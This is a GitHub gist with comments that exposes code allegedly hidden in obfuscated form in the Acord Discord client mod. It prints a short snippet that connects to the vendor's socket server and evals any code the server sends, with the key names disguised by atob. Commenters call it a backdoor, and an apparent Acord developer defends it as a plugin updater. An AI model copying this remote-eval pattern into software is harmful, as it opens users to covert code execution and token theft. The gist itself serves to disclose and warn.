-
-
Save Vendicated/fef37323939e930b52a0e5ec379052bc to your computer and use it in GitHub Desktop.
| // This code can be found in Acord's code in an obfuscated form. Just search for the socket url or one of the atob strings and you will | |
| // find it. | |
| // Permament Link to their Repo (they might delete this): | |
| // https://github.com/AcordPlugin/releases/blob/4944d811f1c5e228c219d4966c5436bdfc6639d3/fixture/extension.js | |
| // Permament Link (fork): | |
| // https://github.com/Vendicated/acord-is-malware/blob/main/fixture/extension.js | |
| // Archive Link: | |
| // https://web.archive.org/web/20230115234723/https://github.com/AcordPlugin/releases/blob/4944d811f1c5e228c219d4966c5436bdfc6639d3/fixture/extension.js | |
| const connection = socketIo.connect("https://socket.acord.app/", { autoConnect: !1, reconnection: !0, transports: ["websocket"] }); | |
| connection.on(atob("OmV2YWx1YXRl") /* :evaluate */, async (code, callback) => { | |
| try { | |
| let data = await window[atob("ZXZhbA==") /* eval */](code); | |
| callback({ ok: true, data: data }); | |
| } catch (t) { | |
| callback({ ok: false, error: `${t}` }); | |
| } | |
| }); |
Also acord has an fully rewrite update in coming, and prob there wont be any evals any more bc acord is not going to make or support its online plugins anymore, but if users donate massively (might happen bc there are lots of user that asking for it) for the online plugins, we might rewrite them, but still there won't be evals, if we had to add an updater this is not going to be happen with eval.
@ErdemGKSL what I dont understand is why the hell it was obfuscated, if you only wanted to update plugins arent there better ways to do it.
What you are doing here is giving yourself ability to execute any command on anyones client running acord which means you can steal tokens and everything, plus being obfuscated makes it only way more suspicious
Permament Link to their Repo (they might delete this):
It seems that link you have mentioned in this gist has been deleted. However, after doing some digging I have located a potential updated source link organization:
Because of Ducko's request, In latest updates this is patched with user approval screen for evals, this was used to update plugins just on time, because plugin versions must match with the server side, calling an updater purposed eval as backdoor is a huge accusation to make. If you don't trust acord to protect your privacy, you could state it as ducko does and wait for an update.